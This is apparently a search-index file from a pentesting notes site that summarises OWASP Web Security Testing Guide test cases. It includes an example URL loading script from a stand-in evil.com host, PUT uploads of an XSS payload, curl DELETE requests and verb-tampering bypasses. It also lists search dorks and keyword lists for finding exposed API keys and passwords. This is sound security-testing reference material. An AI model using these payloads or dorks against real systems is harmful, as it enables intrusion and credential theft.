                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-02/","title":"Testing for JavaScript Execution","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.2. Testing for JavaScript Execution

                            ID Link to Hackinglife Link to OWASP Description 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points.","tags":["web pentesting","WSTG-CLNT-02"]},{"location":"OWASP/WSTG-CLNT-03/","title":"Testing for HTML Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.3. Testing for HTML Injection

                            ID Link to Hackinglife Link to OWASP Description 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user=","tags":["web pentesting","WSTG-CLNT-03"]},{"location":"OWASP/WSTG-CLNT-04/","title":"Testing for Client-side URL Redirect","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.4. Testing for Client-side URL Redirect

                            ID Link to Hackinglife Link to OWASP Description 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site","tags":["web pentesting","WSTG-CLNT-04"]},{"location":"OWASP/WSTG-CLNT-05/","title":"Testing for CSS Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.5. Testing for CSS Injection

                            ID Link to Hackinglife Link to OWASP Description 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection.","tags":["web pentesting","WSTG-CLNT-05"]},{"location":"OWASP/WSTG-CLNT-06/","title":"Testing for Client-side Resource Manipulation","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.6. Testing for Client-side Resource Manipulation

                            ID Link to Hackinglife Link to OWASP Description 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js","tags":["web pentesting","WSTG-CLNT-06"]},{"location":"OWASP/WSTG-CLNT-07/","title":"Testing Cross Origin Resource Sharing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.7. Testing Cross Origin Resource Sharing

                            ID Link to Hackinglife Link to OWASP Description 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless.","tags":["web pentesting","WSTG-CLNT-07"]},{"location":"OWASP/WSTG-CLNT-08/","title":"Testing for Cross Site Flashing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.8. Testing for Cross Site Flashing

                            ID Link to Hackinglife Link to OWASP Description 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil","tags":["web pentesting","WSTG-CLNT-08"]},{"location":"OWASP/WSTG-CLNT-09/","title":"Testing for Clickjacking","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.9. Testing for Clickjacking

                            ID Link to Hackinglife Link to OWASP Description 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable.","tags":["web pentesting","WSTG-CLNT-09"]},{"location":"OWASP/WSTG-CLNT-10/","title":"Testing WebSockets","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.10. Testing WebSockets

                            ID Link to Hackinglife Link to OWASP Description 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels.","tags":["web pentesting","WSTG-CLNT-10"]},{"location":"OWASP/WSTG-CLNT-11/","title":"Testing Web Messaging","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.11. Testing Web Messaging

                            ID Link to Hackinglife Link to OWASP Description 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input.","tags":["web pentesting","WSTG-CLNT-11"]},{"location":"OWASP/WSTG-CLNT-12/","title":"Testing Browser Storage","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.12. Testing Browser Storage

                            ID Link to Hackinglife Link to OWASP Description 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries.","tags":["web pentesting","WSTG-CLNT-12"]},{"location":"OWASP/WSTG-CLNT-13/","title":"Testing for Cross Site Script Inclusion","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.13. Testing for Cross Site Script Inclusion

                            ID Link to Hackinglife Link to OWASP Description 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques.","tags":["web pentesting","WSTG-CLNT-13"]},{"location":"OWASP/WSTG-CLNT-14/","title":"Testing for Reverse Tabnabbing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.14. Testing for Reverse Tabnabbing

                            ID Link to Hackinglife Link to OWASP Description 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["web pentesting","WSTG-CLNT-14"]},{"location":"OWASP/WSTG-CONF-01/","title":"Test Network Infrastructure Configuration","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.1. Test Network Infrastructure Configuration

                            ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.","tags":["web pentesting","reconnaissance","WSTG-CONF-01","dorkings"]},{"location":"OWASP/WSTG-CONF-02/","title":"Test Application Platform Configuration","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.2. Test Application Platform Configuration

                            ID Link to Hackinglife Link to OWASP Description 2.2 WSTG-CONF-02 Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40, 50) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review","tags":["web pentesting","reconnaissance","WSTG-CONF-02"]},{"location":"OWASP/WSTG-CONF-03/","title":"Test File Extensions Handling for Sensitive Information","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.3. Test File Extensions Handling for Sensitive Information

                            ID Link to Hackinglife Link to OWASP Description 2.3 WSTG-CONF-03 Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set.","tags":["web pentesting","reconnaissance","WSTG-CONF-03"]},{"location":"OWASP/WSTG-CONF-04/","title":"Review Old Backup and Unreferenced Files for Sensitive Information","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.4. Review Old Backup and Unreferenced Files for Sensitive Information

                            ID Link to Hackinglife Link to OWASP Description 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename","tags":["web pentesting","reconnaissance","WSTG-CONF-04"]},{"location":"OWASP/WSTG-CONF-05/","title":"Enumerate Infrastructure and Application Admin Interfaces","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.5. Enumerate Infrastructure and Application Admin Interfaces

                            ID Link to Hackinglife Link to OWASP Description 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)","tags":["web pentesting","reconnaissance","WSTG-CONF-05"]},{"location":"OWASP/WSTG-CONF-06/","title":"Test HTTP Methods","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.6. Test HTTP Methods

                            ID Link to Hackinglife Link to OWASP Description 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques.

                            HTTP method tampering, also known as HTTP verb tampering, is a type of security vulnerability that can be exploited in web applications. HTTP method tampering occurs when an attacker modifies the HTTP method being used in a request to trick the web application into performing unintended actions.

                            More about HTTP methods.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#test-objectives","title":"Test Objectives","text":"
                            • Enumerate supported HTTP methods.
                            • Test for access control bypass.
                            • Test HTTP method overriding techniques.

                            Enumerate with OPTIONS:

                            curl -v -X OPTIONS <target>\n

                            Test access control bypass with a made-up method:

                            curl -v -X FAKEMETHOD <target>\n

                            Or test access control bypass with other methods.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#put","title":"PUT","text":"

                            After enumerating methods with Burpsuite:

                            OPTIONS /uploads HTTP/1.1\nHost: example.org\n

                            We obtained as response:

                            HTTP/1.1 200 OK\nDate: ....\n....\nAllow: OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE,PROPPATCH,COPY,MOVE,LOCK\n

                            Then, we can try to upload a file by using Burpsuite. Typical payload:

                            PUT /test.html HTTP/1.1\nHost: example.org\nContent-Length: 25\n\n<script>alert(1)</script>\n

                            Try to upload a file by using curl. Typical payload:

                            curl https://example.org --upload-file test.html\ncurl -X PUT https://example.org/test.html -d \"<script>alert(1)</script>\"\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#delete","title":"DELETE","text":"

                            Try to delete a file by using Burpsuite. Typical payload:

                            DELETE /uploads/file1.pdf HTTP/1.1\nHost: example.org\n

                            Try to delete a file by using curl. Typical payload:

                            curl -X DELETE https://example.org/uploads/file1.pdf\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#trace","title":"TRACE","text":"

                            The\u00a0TRACE\u00a0method (or Microsoft\u2019s equivalent\u00a0TRACK\u00a0method) causes the server to echo back the contents of the request. This led to a vulnerability called Cross-Site Tracing (XST), which could be used to access cookies that had the\u00a0HttpOnly\u00a0flag set. The\u00a0TRACE\u00a0method has been blocked in all browsers and plugins for many years; as such, this issue is no longer exploitable. However, it may still be flagged by automated scanning tools, and the\u00a0TRACE\u00a0method being enabled on a web server suggests that is has not been properly hardened.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#connect","title":"CONNECT","text":"

                            The\u00a0CONNECT\u00a0method causes the web server to open a TCP connection to another system, and then pass traffic from the client to that system. This could allow an attacker to proxy traffic through the server, in order to hide their source address, access internal systems or access services that are bound to localhost. An example of a\u00a0CONNECT\u00a0request is shown below:

                            CONNECT 192.168.0.1:443 HTTP/1.1\nHost: example.org\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-access-control-bypass","title":"Testing for Access Control Bypass","text":"

                            If a page on the application redirects users to a login page with a 302 code when they attempt to access it directly, it may be possible to bypass this by making a request with a different HTTP method, such as\u00a0HEAD,\u00a0POST\u00a0or even a made up method such as\u00a0FOO. If the web application responds with a\u00a0HTTP/1.1 200 OK\u00a0rather than the expected\u00a0HTTP/1.1 302 Found, it may then be possible to bypass the authentication or authorization.

                            HEAD /admin/ HTTP/1.1\nHost: example.org\n
                            HTTP/1.1 200 OK\n[...]\nSet-Cookie: adminSessionCookie=[...];\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-http-method-overriding","title":"Testing for HTTP Method Overriding","text":"

                            Some web frameworks provide a way to override the actual HTTP method in the request. They achieve this by emulating the missing HTTP verbs and passing some custom headers in the requests. For example:

                            • X-HTTP-Method
                            • X-HTTP-Method-Override
                            • X-Method-Override

                            To test this, consider scenarios where restricted verbs like\u00a0PUT\u00a0or\u00a0DELETE\u00a0return a\u00a0405 Method not allowed. In such cases, replay the same request, but add the alternative headers for HTTP method overriding.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-07/","title":"Test HTTP Strict Transport Security","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.7. Test HTTP Strict Transport Security

                            ID Link to Hackinglife Link to OWASP Description 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ |","tags":["web pentesting","reconnaissance","WSTG-CONF-07"]},{"location":"OWASP/WSTG-CONF-08/","title":"Test RIA Cross Domain Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.8. Test RIA Cross Domain Policy

                            ID Link to Hackinglife Link to OWASP Description 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.","tags":["web pentesting","reconnaissance","WSTG-CONF-08"]},{"location":"OWASP/WSTG-CONF-09/","title":"Test File Permission","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.9. Test File Permission

                            ID Link to Hackinglife Link to OWASP Description 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default.","tags":["web pentesting","reconnaissance","WSTG-CONF-09"]},{"location":"OWASP/WSTG-CONF-10/","title":"Test for Subdomain Takeover","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.10. Test for Subdomain Takeover

                            ID Link to Hackinglife Link to OWASP Description 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains.","tags":["web pentesting","reconnaissance","WSTG-CONF-10"]},{"location":"OWASP/WSTG-CONF-11/","title":"Test Cloud Storage","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.11. Test Cloud Storage

                            ID Link to Hackinglife Link to OWASP Description 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place.","tags":["web pentesting","reconnaissance","WSTG-CONF-11"]},{"location":"OWASP/WSTG-CONF-12/","title":"Testing for Content Security Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.12. Testing for Content Security Policy

                            ID Link to Hackinglife Link to OWASP Description 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations.","tags":["web pentesting","reconnaissance","WSTG-CONF-12"]},{"location":"OWASP/WSTG-CONF-13/","title":"Test Path Confusion","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.13. Test Path Confusion

                            ID Link to Hackinglife Link to OWASP Description 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["web pentesting","reconnaissance","WSTG-CONF-13"]},{"location":"OWASP/WSTG-CRYP-01/","title":"Testing for Weak Transport Layer Security","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.1. Testing for Weak Transport Layer Security

                            ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application.","tags":["web pentesting","WSTG-CRYP-01"]},{"location":"OWASP/WSTG-CRYP-02/","title":"Testing for Padding Oracle","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.2. Testing for Padding Oracle

                            ID Link to Hackinglife Link to OWASP Description 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.","tags":["web pentesting","WSTG-CRYP-02"]},{"location":"OWASP/WSTG-CRYP-03/","title":"Testing for Sensitive Information Sent via Unencrypted Channels","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.3. Testing for Sensitive Information Sent via Unencrypted Channels

                            ID Link to Hackinglife Link to OWASP Description 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data)","tags":["web pentesting","WSTG-CRYP-03"]},{"location":"OWASP/WSTG-CRYP-04/","title":"Testing for Weak Encryption","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.4. Testing for Weak Encryption

                            ID Link to Hackinglife Link to OWASP Description 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["web pentesting","WSTG-CRYP-04"]},{"location":"OWASP/WSTG-ERRH-01/","title":"Testing for Improper Error Handling","text":"

                            OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Improper Error Handling

                            ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: Random files/folders (40x) - Analyze the different output returned.","tags":["web pentesting","WSTG-ERRH-01"]},{"location":"OWASP/WSTG-ERRH-02/","title":"Testing for Stack Traces","text":"

                            OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Stack Traces

                            ID Link to Hackinglife Link to OWASP Description 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["web pentesting","WSTG-ERRH-02"]},{"location":"OWASP/WSTG-IDNT-01/","title":"Test Role Definitions","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.1. Test Role Definitions

                            ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given.

                            OWASP/WSTG-IDNT-01.md

                            ","tags":["web pentesting","WSTG-IDNT-01"]},{"location":"OWASP/WSTG-IDNT-02/","title":"Test User Registration Process","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.2. Test User Registration Process

                            ID Link to Hackinglife Link to OWASP Description 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process.","tags":["web pentesting","WSTG-IDNT-02"]},{"location":"OWASP/WSTG-IDNT-03/","title":"Test Account Provisioning Process","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.3. Test Account Provisioning Process

                            ID Link to Hackinglife Link to OWASP Description 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type.","tags":["web pentesting","WSTG-IDNT-03"]},{"location":"OWASP/WSTG-IDNT-04/","title":"Testing for Account Enumeration and Guessable User Account","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.4. Testing for Account Enumeration and Guessable User Account

                            ID Link to Hackinglife Link to OWASP Description 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis.","tags":["web pentesting","WSTG-IDNT-04"]},{"location":"OWASP/WSTG-IDNT-05/","title":"Testing for Weak or Unenforced Username Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.5 Testing for Weak or Unenforced Username Policy

                            ID Link to Hackinglife Link to OWASP Description 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["web pentesting","WSTG-IDNT-05"]},{"location":"OWASP/WSTG-INFO-01/","title":"Conduct search engine discovery reconnaissance for information leakage","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).

                            This is merely passive reconnaissance.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-multiple-search-engines","title":"Use multiple search engines","text":"
                            • Baidu
                            • Bing
                            • binsearch.info
                            • Common crawl
                            • Duckduckgo
                            • Wayback machine
                            • Startpage (based on google but trackers and logs)
                            • Shodan.
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-operators","title":"Use operators","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#google-dorks","title":"Google Dorks","text":"

                            More about google dorks.

                            Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.

                            Use cache operator

                            cache:target.com\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#github","title":"Github","text":"

                            More Githun Dorking.

                            Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#shodan","title":"Shodan","text":"

                            Go to shodan.

                            Shodan Dowking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If you are using wordpress","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#waybackmachine-with-waybackurls","title":"WaybackMachine with WayBackUrls","text":"

                            waybackurls inspects back URLs saved by Wayback Machine and look for specific keywords. Installation:

                            go install github.com/tomnomnom/waybackurls@latest\n

                            Basic usage:

                            waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n

                            Dork for API endpoints discovery:

                            Waybackmachine Dowking Query Expected results Path to a API We are trying to see is there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly not anymore.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-02/","title":"Fingerprint Web Server","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

                            ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#passive-fingerprinting","title":"Passive fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#whois","title":"Whois","text":"
                             whois $TARGET\n
                            whois.exe <TARGET>\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#banner-grabbing","title":"Banner grabbing","text":"
                            • nmap.
                              # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
                            • telnet
                            • openssl
                              openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
                              • sending malformed request (with SANTACLAUS method for instance):
                                GET / SANTACLAUS/1.1\n
                            • Some targets obfuscate their servers by modifying headers, but, there is a default ordering in the headers response, so you can do some guessing from ordering too.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#automatic-scanning-tools","title":"Automatic scanning tools","text":"

                            netcraft, nikto.

                            Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#active-fingerprinting","title":"Active fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#http-headers-and-html-source-code","title":"HTTP headers and HTML Source code","text":"
                            • Note the response header Server, X-Powered-By, or X-Generator as well.
                            • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                            • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
                            nmap -sV -F target\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-03/","title":"Review Webserver Metafiles for Information Leakage","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.3. Review Webserver Metafiles for Information Leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, <META> tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand.","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#searching-for-well-known-files","title":"Searching for well-known files","text":"
                            • robots.txt
                            • sitemap.xml
                            • security.txt (proposed standard which allows websites to define security policies and contact details.)
                            • human.txt (initiative for knowing the people behind a website.)
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#examining-meta-tags","title":"Examining META tags","text":"

                            <META> tags are located within the HEADsection of each HTML document.

                            Robots directive can also be specified through the use of a specific METAtag.

                            <META NAME=\"ROBOTS\" ...>\n

                            If no META tag is present, then the default is INDEX, FOLLOW.

                            Other revealing META tags.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#the-well-known-directory","title":"The .well-known/ directory","text":"

                            Some of the files are these: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-04/","title":"Enumerate Applications on Webserver","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

                            ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

                            Web application discovery is a process aimed at identifying web applications on a given infrastructure:

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#1-different-based-url","title":"1. Different based URL","text":"

                            https://example.com/application1 and https://example.com/application2

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#google-dork","title":"google dork","text":"

                            If these applications are indexed, try this google dork:

                            site:example.com\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#gobuster","title":"gobuster","text":"

                            gobuster Cheat sheet.

                            Brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner).

                            gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b flag is to exclude from results an specific http response\n
